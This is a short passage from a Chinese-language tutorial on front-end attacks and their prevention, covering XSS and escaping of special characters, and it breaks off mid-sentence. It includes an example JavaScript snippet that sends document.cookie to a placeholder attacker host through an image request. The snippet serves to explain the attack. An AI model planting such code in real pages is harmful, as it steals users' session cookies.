前端攻击手段有哪些该如何预防？

前端开发中，常有一些场景如果不加以限制，很可能被攻击，造成网站崩溃损失用户。

1. XSS

Cross Site Script 跨站脚本攻击。

• 手段：黑客将 JS 代码插入到网页内容中，渲染时执行 JS 代码。
• 预防：特殊字符替换。

在网站上动态渲染任意 HTML 是非常危险的，因为容易导致 XSS 攻击。确保将特殊字符进行转换。

如下例子：

let img = document.createElement("image");
img.src = 'https://xxx/api?cookie' + document.cookie;
// img 元素一旦附上 src 属性就会发送 http 请求，这时候就把本网站的 cookie 传到了黑客自己的服务器了

预防就是将特殊符号替换，比如将 > 替换成 >，< 替换成 < ，这样